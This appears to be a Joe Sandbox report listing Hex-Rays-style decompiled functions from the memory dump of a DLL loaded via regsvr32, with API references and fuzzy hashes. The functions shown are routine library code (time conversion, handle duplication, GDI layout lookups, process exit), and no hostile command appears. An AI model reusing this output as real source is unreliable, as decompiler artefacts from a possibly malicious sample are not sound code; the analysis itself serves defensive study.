                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$ParentPostSendUpdateWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4141989945-2766056989
                                                                                                            • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                                                            • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10026A96 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v44;
				void* __ebp;
				int _t23;
				int _t26;
				int _t29;
				int _t31;
				void* _t40;
				void* _t56;
				void* _t59;

				_t47 = __edx;
				_t40 = __ecx;
				_t56 = _t59;
				if(_a8 != 0) {
					_t52 = _a4;
					_v28.wYear = E10010297(__eflags);
					_v28.wMonth = E100102AE(__eflags);
					_t23 = E100134E7(_a4, __edx, _a4);
					__eflags = _t23;
					if(__eflags == 0) {
						_v28.wDay = 0;
					} else {
						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
					}
					_v28.wHour = E100102C1(__eflags);
					_v28.wMinute = E100102D4(__eflags);
					_t26 = E100134E7(_t52, _t47, _t52);
					__eflags = _t26;
					if(_t26 == 0) {
						_t14 =  &(_v28.wSecond);
						 *_t14 = _v28.wSecond | 0x0000ffff;
						__eflags =  *_t14;
					} else {
						_v28.wSecond =  *_t26;
					}
					_v28.wMilliseconds = 0;
					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
					__eflags = _t29;
					if(_t29 == 0) {
						E100271C6(_t56, GetLastError(), 0);
					}
					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
					__eflags = _t31;
					if(_t31 == 0) {
						_t31 = E100271C6(_t56, GetLastError(), 0);
					}
					return _t31;
				} else {
					_push(_t56);
					_push(__ecx);
					_v44 = 0x1004d548;
					E10011C0F( &_v44, 0x10045e48);
					asm("int3");
					return  *((intOrPtr*)(_t40 + 0x70));
				}
			}














                                                                                                            0x10026a96
                                                                                                            0x10026a96
                                                                                                            0x10026a97
                                                                                                            0x10026aa3
                                                                                                            0x10026aaa
                                                                                                            0x10026ab6
                                                                                                            0x10026ac0
                                                                                                            0x10026ac4
                                                                                                            0x10026ac9
                                                                                                            0x10026acc
                                                                                                            0x10026ad8
                                                                                                            0x10026ace
                                                                                                            0x10026ad2
                                                                                                            0x10026ad2
                                                                                                            0x10026ae5
                                                                                                            0x10026aef
                                                                                                            0x10026af3
                                                                                                            0x10026af8
                                                                                                            0x10026afb
                                                                                                            0x10026b06
                                                                                                            0x10026b06
                                                                                                            0x10026b06
                                                                                                            0x10026afd
                                                                                                            0x10026b00
                                                                                                            0x10026b00
                                                                                                            0x10026b14
                                                                                                            0x10026b18
                                                                                                            0x10026b1e
                                                                                                            0x10026b26
                                                                                                            0x10026b2c
                                                                                                            0x10026b2c
                                                                                                            0x10026b38
                                                                                                            0x10026b3e
                                                                                                            0x10026b40
                                                                                                            0x10026b46
                                                                                                            0x10026b46
                                                                                                            0x10026b4e
                                                                                                            0x10026aa5
                                                                                                            0x1001ce6f
                                                                                                            0x1001ce72
                                                                                                            0x1001ce7c
                                                                                                            0x1001ce83
                                                                                                            0x1001ce88
                                                                                                            0x1001ce8c
                                                                                                            0x1001ce8c

                                                                                                            APIs
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1172841412-4125583295
                                                                                                            • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                                                            • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100257A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100257A8(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t9;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1001F77E(0x10);
				_t36 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10025742(_t9, _t36, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}











                                                                                                            0x100257a8
                                                                                                            0x100257ab
                                                                                                            0x100257b0
                                                                                                            0x100257b2
                                                                                                            0x100257b7
                                                                                                            0x100257ba
                                                                                                            0x100257c9
                                                                                                            0x100257c9
                                                                                                            0x100257bc
                                                                                                            0x100257c5
                                                                                                            0x100257c5
                                                                                                            0x100257cb
                                                                                                            0x100257dc
                                                                                                            0x100257ee
                                                                                                            0x100257f2
                                                                                                            0x100257fa
                                                                                                            0x100257fa
                                                                                                            0x10025807
                                                                                                            0x10025807
                                                                                                            0x1002580f
                                                                                                            0x10025815
                                                                                                            0x1002581d

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                                                            • GetLastError.KERNEL32(?), ref: 10025800
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3907606552-4125583295
                                                                                                            • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                                                            • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034CE3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10034CE3(void* __ecx, void* __eflags) {
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t35;

				E10011BF0(0x1003a3fc, _t35);
				_push(__ecx);
				_t33 = __ecx;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				E10034BFF(__ecx, 0x20, _t35 - 0x10);
				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
					_t26 = E1001F77E(0x20);
					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
					_t41 = _t26;
					 *(_t35 - 4) = 0;
					if(_t26 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t35 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t20 = E10024F0F(_t26, _t41);
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
					 *((intOrPtr*)( *_t20 + 0x10))();
				}
				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t18;
			}








                                                                                                            0x10034ce8
                                                                                                            0x10034ced
                                                                                                            0x10034cf8
                                                                                                            0x10034cfa
                                                                                                            0x10034cfd
                                                                                                            0x10034d05
                                                                                                            0x10034d14
                                                                                                            0x10034d16
                                                                                                            0x10034d19
                                                                                                            0x10034d1b
                                                                                                            0x10034d1e
                                                                                                            0x10034d37
                                                                                                            0x10034d37
                                                                                                            0x10034d20
                                                                                                            0x10034d20
                                                                                                            0x10034d22
                                                                                                            0x10034d25
                                                                                                            0x10034d2a
                                                                                                            0x10034d2f
                                                                                                            0x10034d30
                                                                                                            0x10034d30
                                                                                                            0x10034d39
                                                                                                            0x10034d3d
                                                                                                            0x10034d47
                                                                                                            0x10034d47
                                                                                                            0x10034d57
                                                                                                            0x10034d5f
                                                                                                            0x10034d67
                                                                                                            0x10034d6f

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10034CE8
                                                                                                              • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                                                            • API String ID: 3519838083-526586445
                                                                                                            • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                                                            • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10028BC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028BC6(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                                                            0x10028bcd
                                                                                                            0x10028bcf
                                                                                                            0x10028bdb
                                                                                                            0x10028bdd
                                                                                                            0x10028be5
                                                                                                            0x10028bf8
                                                                                                            0x10028bfc
                                                                                                            0x10028bff
                                                                                                            0x10028bff
                                                                                                            0x10028be7
                                                                                                            0x10028bf0
                                                                                                            0x10028bf0
                                                                                                            0x10028c09

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$SetLayout
                                                                                                            • API String ID: 4275029093-2147214759
                                                                                                            • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                                                            • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10028B90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028B90(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                                                            0x10028b96
                                                                                                            0x10028ba4
                                                                                                            0x10028bac
                                                                                                            0x10028bb9
                                                                                                            0x10028bbc
                                                                                                            0x10028bae
                                                                                                            0x10028bb3
                                                                                                            0x10028bb3
                                                                                                            0x10028bc5

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$GetLayout
                                                                                                            • API String ID: 4275029093-2396518106
                                                                                                            • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                                                            • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011DCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10011DCF(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}





                                                                                                            0x10011dd4
                                                                                                            0x10011ddc
                                                                                                            0x10011de4
                                                                                                            0x10011dec
                                                                                                            0x10011df2
                                                                                                            0x10011df2
                                                                                                            0x10011dec
                                                                                                            0x10011df8

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                                                            • ExitProcess.KERNEL32 ref: 10011DF8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExitHandleModuleProcProcess
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 75539706-1276376045
                                                                                                            • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                                                            • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100394B0 Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
				CHAR* _t94;
				void* _t100;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				intOrPtr* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				signed short* _t156;
				void* _t157;
				CHAR* _t159;
				int _t161;
				char* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				CHAR* _t171;
				char* _t174;
				CHAR* _t182;

				_t153 = __edx;
				_t148 = __ecx;
				E10011BF0(0x1003b2f6, _t168);
				_t171 = _t170 - 0x2c;
				_t144 =  *(_t168 + 8);
				_t94 = _t144[8];
				 *(_t168 - 0x10) = _t171;
				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
				 *(_t168 - 0x11) = 0;
				 *(_t168 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t168 + 8) = _t168 - 0x11;
				}
				_t161 = lstrlenA( *(_t168 + 8));
				 *(_t168 - 0x18) = _t144[0x10];
				 *(_t168 - 0x1c) = _t144[0xc];
				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t168 + 0x14);
					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
						return _t101;
					}
					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t168 - 0x10) = _t171;
					 *(_t168 + 0xc) = _t171;
					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
					_t174 =  &(_t171[0xc]);
					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t165 = _t38;
					_t108 = E10001000(_t149, _t38);
					_pop(_t151);
					if(_t108 != 0) {
						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
						 *(_t168 - 0x10) = _t174;
						_t166 = _t174;
						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
						_t147 = 0;
						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
						if(_t114 != 0) {
							L17:
							_t166 =  *(_t168 + 0x14);
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							_t157 = 0;
							if(_t166[8] <= 0) {
								L20:
								_t101 =  *((intOrPtr*)(_t168 + 0x18));
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t168 + 0x10);
								if(_t156 == 0) {
									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
									if(_t116 == 0) {
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									if(_t117 == 0) {
										L41:
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									if(_t120 == 0) {
										__imp__#9(_t168 - 0x34);
										goto L46;
									}
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t168 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t168 + 0xc));
								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
								_t157 = _t157 + 1;
							} while (_t157 < _t166[8]);
							goto L20;
						}
						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
						 *(_t168 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							 *(_t168 + 8) = _t182;
							 *(_t168 - 0x34) =  *(_t168 + 8);
							goto L17;
						}
						if(_t128 == 5) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t168 - 0x34) = _t182;
							goto L17;
						}
						if(_t128 == 7) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						if(_t128 <= 0x13 || _t128 > 0x15) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							_t147 = E1003A087();
						} else {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							 *(_t168 - 0x34) = E1003A087();
							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
						}
						goto L17;
					}
					goto L9;
				}
				_t17 = _t161 + 3; // 0x3
				_t158 = _t17;
				_t134 = E10001000(_t148, _t17);
				_pop(_t148);
				if(_t134 == 0) {
					goto L9;
				}
				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t168 - 0x10) = _t171;
				_t159 = _t171;
				E10011440(_t159,  *(_t168 + 8), _t161);
				_t140 = _t144[0xc];
				_t171 =  &(_t171[0xc]);
				 *(_t168 + 8) = _t159;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t159[_t161] = 0xff;
				_t167 = _t161 + 1;
				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
				_t159[_t167] = _t140;
				_t159[_t167 + 1] = 0;
				 *(_t168 - 0x18) = _t144[0x14];
				goto L7;
			}
































                                                                                                            0x100394b0
                                                                                                            0x100394b0
